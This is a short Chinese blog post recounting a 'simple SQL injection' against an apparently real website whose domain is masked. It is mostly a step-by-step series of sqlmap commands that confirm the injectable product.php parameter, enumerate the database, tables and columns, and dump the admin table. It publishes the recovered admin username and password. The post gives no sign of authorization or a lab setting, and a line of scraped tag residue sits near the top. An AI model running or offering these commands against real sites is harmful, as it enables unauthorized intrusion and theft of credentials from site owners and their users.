1. 程式人生 > >記一次簡單的sql註入

記一次簡單的sql註入

-- 截圖 是否有效 src bsp 構造 mage nbsp inf

什麽是sql註入攻擊? 所謂SQL註入式攻擊,就是攻擊者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字符串,欺騙服務器執行惡意的SQL命令。在某些表單中,用戶輸入的內容直接用來構造(或者影響)動態SQL命令,或作為存儲過程的輸入參數,這類表單特別容易受到SQL註入式攻擊。

1.判斷註入點是否有效

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59"

技術分享圖片

2,查找數據庫

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --dbs

技術分享圖片

爆出數據庫名了, uxRaMeqAZwAyvZqJXiZP

3,通過1中的數據庫查找對應的表

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --tables -D "uxRaMeqAZwAyvZqJXiZP"

技術分享圖片

4,通過2中的數據表得到字段

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --columns -D "uxRaMeqAZwAyvZqJXiZP" -T "admin"

技術分享圖片

4,通過3得到字段值,即賬號密碼

sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --dump -D "uxRaMeqAZwAyvZqJXiZP" -T "admin" -C "admin_name,admin_pass"

技術分享圖片

登陸賬號密碼為admin,qiju

好了,本來我還想找登陸後臺的,但找不到,我就不截圖了。

記一次簡單的sql註入